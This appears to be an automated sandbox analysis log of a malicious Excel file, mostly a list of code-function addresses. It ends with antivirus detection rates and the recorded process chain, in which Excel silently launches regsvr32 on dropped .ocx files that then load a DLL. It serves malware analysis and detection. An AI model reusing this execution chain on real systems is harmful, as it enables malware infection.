                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F3284_2_000000018000F328
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002D284_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E1304_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800291344_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800081344_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800217384_2_0000000180021738
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AF384_2_000000018002AF38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800221404_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800283484_2_0000000180028348
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DB4C4_2_000000018000DB4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014F504_2_0000000180014F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B3504_2_000000018000B350
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800069544_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F5544_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002975C4_2_000000018002975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B5644_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800121684_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135684_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243704_2_0000000180024370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800083704_2_0000000180008370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800157744_2_0000000180015774
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800123784_2_0000000180012378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800191784_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800251804_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800019804_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800215884_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A9884_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800181904_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800139944_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026B984_2_0000000180026B98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800289984_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CF9C4_2_000000018001CF9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000359C4_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001EBA04_2_000000018001EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800061A04_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135A64_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016DA84_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800059AC4_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D7AC4_2_000000018000D7AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800053B04_2_00000001800053B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135B44_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001C1B84_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015BB84_2_0000000180015BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800025B84_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800207BC4_2_00000001800207BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085BC4_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800015C04_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FFC04_2_000000018000FFC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800295C84_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800229CC4_2_00000001800229CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E5D44_2_000000018000E5D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A5D84_2_000000018002A5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800173DC4_2_00000001800173DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018BDC4_2_0000000180018BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800261E04_2_00000001800261E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F12B05_2_000007FEF74F12B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F443C5_2_000007FEF74F443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F53FB5_2_000007FEF74F53FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F4A705_2_000007FEF74F4A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F5E015_2_000007FEF74F5E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F5CAD5_2_000007FEF74F5CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F68505_2_000007FEF74F6850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_001300005_2_00130000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180005C745_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002ACE85_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800201185_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000359C5_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E99C5_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800196285_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025A4C5_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B7B25_2_000000018002B7B2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800094085_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180023C145_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800064145_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002582C5_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B8345_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000403C5_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800214445_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800120445_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800160545_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001705C5_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800018705_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F8785_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800144845_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800154945_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BC985_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180008C9C5_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800078A45_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F0A85_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001E4AC5_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800048B05_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ACB45_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800090B45_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800270C05_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800024C05_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800280C85_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800050D45_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800234D85_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800150F05_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800125005_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800241045_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A10C5_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028D105_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A5245_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180002D285_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E1305_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800291345_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800081345_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800221405_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800069545_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F5545_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B5645_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800121685_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800135685_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800245705_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800191785_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800251805_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800019805_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800215885_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A9885_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800181905_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800139945_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800289985_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800061A05_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800135A65_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016DA85_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800059AC5_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800135B45_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001C1B85_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800025B85_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800085BC5_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800015C05_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800295C85_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800229CC5_2_00000001800229CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E5D45_2_000000018000E5D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A5D85_2_000000018002A5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800261E05_2_00000001800261E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800079EC5_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800236245_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800186285_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017E2C5_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800176385_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180004E3C5_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020E405_2_0000000180020E40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015A645_2_0000000180015A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800152645_2_0000000180015264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000A26C5_2_000000018000A26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800076785_2_0000000180007678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001667C5_2_000000018001667C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800126805_2_0000000180012680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001E885_2_0000000180001E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000968C5_2_000000018000968C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800222905_2_0000000180022290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026A905_2_0000000180026A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000529C5_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020AA05_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180022AAC5_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180007EB45_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800162BC5_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800252C05_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001AEC85_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F6DC5_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800026DC5_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180002ADC5_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001E2F45_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016AF45_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000DEF45_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DEFC5_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800063085_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001370C5_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180004B185_2_0000000180004B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015F245_2_0000000180015F24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180006B245_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F3285_2_000000018000F328
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800217385_2_0000000180021738
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002AF385_2_000000018002AF38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800283485_2_0000000180028348
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000DB4C5_2_000000018000DB4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014F505_2_0000000180014F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B3505_2_000000018000B350
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000A7585_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002975C5_2_000000018002975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800243705_2_0000000180024370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800083705_2_0000000180008370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800157745_2_0000000180015774
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800123785_2_0000000180012378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026B985_2_0000000180026B98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CF9C5_2_000000018001CF9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001EBA05_2_000000018001EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001B3A45_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D7AC5_2_000000018000D7AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800053B05_2_00000001800053B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015BB85_2_0000000180015BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800207BC5_2_00000001800207BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FFC05_2_000000018000FFC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800173DC5_2_00000001800173DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018BDC5_2_0000000180018BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_001B00007_2_001B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C8197_2_000000018000C819
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800196287_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180025A4C7_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001705C7_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800128647_2_0000000180012864
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180005C747_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800248B07_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800252C07_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800024C07_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180006B247_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180006F2C7_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000A7587_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800245707_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000E99C7_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001B3A47_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800079EC7_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800094087_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180023C147_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800064147_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800236247_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800186287_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002582C7_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180017E2C7_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000B8347_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800176387_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000403C7_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180004E3C7_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020E407_2_0000000180020E40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800214447_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800120447_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800160547_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180015A647_2_0000000180015A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800152647_2_0000000180015264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000A26C7_2_000000018000A26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800018707_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F8787_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800076787_2_0000000180007678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001667C7_2_000000018001667C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800126807_2_0000000180012680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800144847_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001E887_2_0000000180001E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000968C7_2_000000018000968C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800222907_2_0000000180022290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180026A907_2_0000000180026A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800154947_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BC987_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000529C7_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180008C9C7_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020AA07_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800078A47_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F0A87_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180022AAC7_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E4AC7_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800048B07_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001ACB47_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180007EB47_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800090B47_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800162BC7_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800270C07_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800280C87_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001AEC87_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800050D47_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800234D87_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F6DC7_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800026DC7_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180002ADC7_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002ACE87_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800150F07_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E2F47_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016AF47_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000DEF47_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001DEFC7_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800125007_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800241047_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800063087_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001370C7_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A10C7_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74F7FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF70C7FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF70CBD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74FBD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D27FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74FB3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF70CB3B0 appears 148 times
                      Source: 5F20.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                      Source: Scan 2022.20.05_0910.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: Scan 2022.20.05_0910.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: Scan 2022.20.05_0910.xlsVirustotal: Detection: 44%
                      Source: Scan 2022.20.05_0910.xlsReversingLabs: Detection: 36%
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlMfP\OpoHHoBHS.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
